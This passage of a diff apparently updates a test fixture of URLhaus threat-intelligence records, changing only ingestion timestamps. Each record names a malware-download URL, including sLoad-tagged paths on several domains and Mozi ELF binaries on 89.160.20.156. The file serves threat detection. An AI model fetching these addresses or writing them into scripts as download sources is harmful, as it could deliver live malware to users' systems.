listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5198,7 +5198,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025278100Z", + "ingested": "2021-12-14T14:56:15.726429318Z", "original": "{\"id\":\"961440\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961440/\",\"url\":\"https://fhivelifestyle.online/nhbrwvdffsgt/adf/uk.css\",\"url_status\":\"offline\",\"host\":\"fhivelifestyle.online\",\"date_added\":\"2021-01-14 20:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5244,7 +5244,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025285200Z", + "ingested": "2021-12-14T14:56:15.726429885Z", "original": "{\"id\":\"961441\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961441/\",\"url\":\"https://letonguesc.com/leto/BNTLGU67R11L706R/blank.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5290,7 +5290,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025292200Z", + "ingested": "2021-12-14T14:56:15.726430245Z", "original": "{\"id\":\"961437\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961437/\",\"url\":\"https://cxminute.com/minu/03713610651/map.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5336,7 +5336,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025299Z", + "ingested": "2021-12-14T14:56:15.726430674Z", "original": "{\"id\":\"961436\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961436/\",\"url\":\"https://univirtek.com/viro/01312580507/uk.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5382,7 +5382,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025306Z", + "ingested": "2021-12-14T14:56:15.726431092Z", "original": "{\"id\":\"961431\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961431/\",\"url\":\"https://cxminute.com/minu/FRNRST34B11F843P/blank.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5428,7 +5428,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025312800Z", + "ingested": "2021-12-14T14:56:15.726431444Z", "original": "{\"id\":\"961432\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961432/\",\"url\":\"https://univirtek.com/viro/RCUNDA90D24Z100H/1x1.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5474,7 +5474,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025319700Z", + "ingested": "2021-12-14T14:56:15.726431804Z", "original": "{\"id\":\"961433\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961433/\",\"url\":\"https://univirtek.com/viro/GTTGRI72H19A952D/map.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5520,7 +5520,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025326500Z", + "ingested": "2021-12-14T14:56:15.726432177Z", "original": "{\"id\":\"961434\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961434/\",\"url\":\"https://univirtek.com/viro/00385010103/map.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5566,7 +5566,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025333400Z", + "ingested": "2021-12-14T14:56:15.726432645Z", "original": "{\"id\":\"961435\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961435/\",\"url\":\"https://ladiesincode.com/ladi/04263990162/map.css\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:48:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5612,7 +5612,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025340300Z", + "ingested": "2021-12-14T14:56:15.726433070Z", "original": "{\"id\":\"961428\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961428/\",\"url\":\"https://univirtek.com/viro/BNNSFN74A13G674O/logo.png\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5658,7 +5658,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025347200Z", + "ingested": "2021-12-14T14:56:15.726433423Z", "original": "{\"id\":\"961429\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961429/\",\"url\":\"https://univirtek.com/viro/RZZCRS93B15G224O/it.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5704,7 +5704,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025354100Z", + "ingested": "2021-12-14T14:56:15.726433780Z", "original": "{\"id\":\"961430\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961430/\",\"url\":\"https://cxminute.com/minu/01495100032/maps.gif\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5750,7 +5750,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025361Z", + "ingested": "2021-12-14T14:56:15.726434623Z", "original": "{\"id\":\"961427\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961427/\",\"url\":\"https://letonguesc.com/leto/CMPDVD69C11G693Z/map.gif\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:48:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5796,7 +5796,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025367800Z", + "ingested": "2021-12-14T14:56:15.726435051Z", "original": "{\"id\":\"961426\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961426/\",\"url\":\"https://cxminute.com/minu/LLLMRC84B29A944R/it.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5842,7 +5842,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025374700Z", + "ingested": "2021-12-14T14:56:15.726435410Z", "original": "{\"id\":\"961421\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961421/\",\"url\":\"https://cxminute.com/minu/PRSSFN72L18C573S/map.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5888,7 +5888,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025381600Z", + "ingested": "2021-12-14T14:56:15.726435767Z", "original": "{\"id\":\"961422\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961422/\",\"url\":\"https://ladiesincode.com/ladi/00814870150/1x1.png\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5934,7 +5934,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025388400Z", + "ingested": "2021-12-14T14:56:15.726436129Z", "original": "{\"id\":\"961423\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961423/\",\"url\":\"https://ladiesincode.com/ladi/03635540234/it.gif\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5980,7 +5980,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025395300Z", + "ingested": "2021-12-14T14:56:15.726436588Z", "original": "{\"id\":\"961424\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961424/\",\"url\":\"https://univirtek.com/viro/PLCSFN62B11D548Q/map.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6026,7 +6026,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025402200Z", + "ingested": "2021-12-14T14:56:15.726436948Z", "original": "{\"id\":\"961425\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961425/\",\"url\":\"https://univirtek.com/viro/03294650167/maps.jpg\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6072,7 +6072,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025409200Z", + "ingested": "2021-12-14T14:56:15.726437297Z", "original": "{\"id\":\"961418\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961418/\",\"url\":\"https://univirtek.com/viro/GGLSCR73D17C627Q/blank.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6118,7 +6118,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025416100Z", + "ingested": "2021-12-14T14:56:15.726437655Z", "original": "{\"id\":\"961419\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961419/\",\"url\":\"https://univirtek.com/viro/CRRLRA68A70H501X/maps.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6164,7 +6164,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025422900Z", + "ingested": "2021-12-14T14:56:15.726438127Z", "original": "{\"id\":\"961420\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961420/\",\"url\":\"https://ladiesincode.com/ladi/CRSNLD59R12L840V/blank.jpg\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:48:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6210,7 +6210,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025429800Z", + "ingested": "2021-12-14T14:56:15.726438538Z", "original": "{\"id\":\"961416\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961416/\",\"url\":\"https://belfetproduction.com/bella/RTTCRL58M29A794D/logo.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:47:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6256,7 +6256,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025436500Z", + "ingested": "2021-12-14T14:56:15.726438903Z", "original": "{\"id\":\"961417\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961417/\",\"url\":\"https://letonguesc.com/leto/04138120169/en.jpg\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:47:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6302,7 +6302,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025443400Z", + "ingested": "2021-12-14T14:56:15.726439260Z", "original": "{\"id\":\"961408\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961408/\",\"url\":\"https://letonguesc.com/leto/SPGMRC73H13A475I/it.jpg\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6348,7 +6348,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025450300Z", + "ingested": "2021-12-14T14:56:15.726439624Z", "original": "{\"id\":\"961409\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961409/\",\"url\":\"https://letonguesc.com/leto/80007070552/it.png\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6394,7 +6394,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025457200Z", + "ingested": "2021-12-14T14:56:15.726439992Z", "original": "{\"id\":\"961410\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961410/\",\"url\":\"https://letonguesc.com/leto/02482130271/logo.png\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6440,7 +6440,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025464Z", + "ingested": "2021-12-14T14:56:15.726440402Z", "original": "{\"id\":\"961411\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961411/\",\"url\":\"https://univirtek.com/viro/15730201009/uk.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6486,7 +6486,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025471Z", + "ingested": "2021-12-14T14:56:15.726440756Z", "original": "{\"id\":\"961412\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961412/\",\"url\":\"https://univirtek.com/viro/01074480250/maps.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6532,7 +6532,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025477900Z", + "ingested": "2021-12-14T14:56:15.726441110Z", "original": "{\"id\":\"961413\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961413/\",\"url\":\"https://cxminute.com/minu/SCHRKE77C47G224W/1x1.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6578,7 +6578,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025484900Z", + "ingested": "2021-12-14T14:56:15.726441475Z", "original": "{\"id\":\"961414\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961414/\",\"url\":\"https://cxminute.com/minu/04281560377/en.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6624,7 +6624,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025491800Z", + "ingested": "2021-12-14T14:56:15.726441836Z", "original": "{\"id\":\"961415\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961415/\",\"url\":\"https://ladiesincode.com/ladi/02613440060/maps.png\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6670,7 +6670,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025498700Z", + "ingested": "2021-12-14T14:56:15.726442216Z", "original": "{\"id\":\"961406\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961406/\",\"url\":\"https://nowyouknowent.com/werdona/PLLRRT83A05H501O/it.gif\",\"url_status\":\"offline\",\"host\":\"nowyouknowent.com\",\"date_added\":\"2021-01-14 20:47:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6716,7 +6716,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025505500Z", + "ingested": "2021-12-14T14:56:15.726442577Z", "original": "{\"id\":\"961407\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961407/\",\"url\":\"https://hoagtechhydroponics.com/teco/LGTCDC74T45F205G/logo.png\",\"url_status\":\"offline\",\"host\":\"hoagtechhydroponics.com\",\"date_added\":\"2021-01-14 20:47:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6762,7 +6762,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025512400Z", + "ingested": "2021-12-14T14:56:15.726442933Z", "original": "{\"id\":\"961404\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961404/\",\"url\":\"https://belfetproduction.com/bella/00160060349/uk.jpg\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:42:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6808,7 +6808,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025519300Z", + "ingested": "2021-12-14T14:56:15.726443433Z", "original": "{\"id\":\"961405\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961405/\",\"url\":\"https://belfetproduction.com/bella/01288650243/1x1.jpg\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:42:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6858,7 +6858,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025526200Z", + "ingested": "2021-12-14T14:56:15.726443793Z", "original": "{\"id\":\"961403\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961403/\",\"url\":\"http://89.160.20.156:50611/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:39:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -6907,7 +6907,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025533Z", + "ingested": "2021-12-14T14:56:15.726444141Z", "original": "{\"id\":\"961402\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961402/\",\"url\":\"http://89.160.20.156:45371/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:14 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -6956,7 +6956,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025539800Z", + "ingested": "2021-12-14T14:56:15.726444500Z", "original": "{\"id\":\"961400\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961400/\",\"url\":\"http://89.160.20.156:50093/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7005,7 +7005,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025546700Z", + "ingested": "2021-12-14T14:56:15.726444934Z", "original": "{\"id\":\"961401\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961401/\",\"url\":\"http://89.160.20.156:36652/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7054,7 +7054,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025555600Z", + "ingested": "2021-12-14T14:56:15.726445296Z", "original": "{\"id\":\"961397\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961397/\",\"url\":\"http://89.160.20.156:54182/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7103,7 +7103,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025562700Z", + "ingested": "2021-12-14T14:56:15.726445700Z", "original": "{\"id\":\"961398\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961398/\",\"url\":\"http://89.160.20.156:46048/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7152,7 +7152,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025569900Z", + "ingested": "2021-12-14T14:56:15.726446053Z", "original": "{\"id\":\"961399\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961399/\",\"url\":\"http://89.160.20.156:33953/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -7201,7 +7201,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.025576800Z", + "ingested": "2021-12-14T14:56:15.726446485Z", "original": "{\"id\":\"961393\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961393/\",\"url\":\"http://89.160.20.156:36447/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:35:05 